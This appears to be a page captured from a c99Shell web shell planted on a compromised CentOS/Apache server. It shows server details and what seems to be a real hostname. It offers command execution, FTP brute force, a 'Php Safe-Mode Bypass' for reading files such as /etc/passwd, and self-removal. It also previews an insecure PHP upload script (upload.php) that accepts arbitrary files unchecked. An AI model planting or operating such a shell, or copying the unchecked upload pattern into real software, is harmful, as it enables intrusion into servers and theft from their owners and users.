!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 52.98 GB of 127.8 GB (41.45%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     upload.php (304 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/manage/upload.php
Size 304 B
MD5 a7ba6a281f42897f96d8a598c6f1eadd
Owner/Group apache/apache
Perms-rw-r--r--
Create time 03/07/2013 18:31:17
Access time 04/07/2024 03:36:33
MODIFY time 20/04/2004 20:29:36

HEXDUMP PREVIEW
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
3C 3F 70 68 70 0A 24 75 70 66 69 6C 65 20 3D 20 22 2F 75 70 6C 6F 61 64
73 2F 22 2E 24 75 73 65 72 66 69 6C 65 5F 6E 61 6D 65 3B 0A 69 66 20 28
69 73 5F 75 70 6C 6F 61 64 65 64 5F 66 69 6C 65 28 24 48 54 54 50 5F 50
4F 53 54 5F 46 49 4C 45 53 5B 27 75 73 65 72 66 69 6C 65 27 5D 5B 27 74
6D 70 5F 6E 61 6D 65 27 5D 29 29 0A 20 20 20 63 6F 70 79 28 24 75 73 65
72 66 69 6C 65 2C 24 75 70 66 69 6C 65 29 3B 0A 20 20 20 65 63 68 6F 22
75 70 6C 6F 61 64 20 66 69 6C 65 20 63 6F 6D 70 6C 65 74 65 20 22 3B 0A
20 20 20 24 66 70 20 3D 20 66 6F 70 65 6E 28 24 75 70 66 69 6C 65 2C 22
<?php $upfile = "/upload
s/".$userfile_name; if (
is_uploaded_file($HTTP_P
OST_FILES['userfile']['t
mp_name']))    copy($use
rfile,$upfile);    echo"
upload file complete "; 
   $fp = fopen($upfile,"

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0052 ]--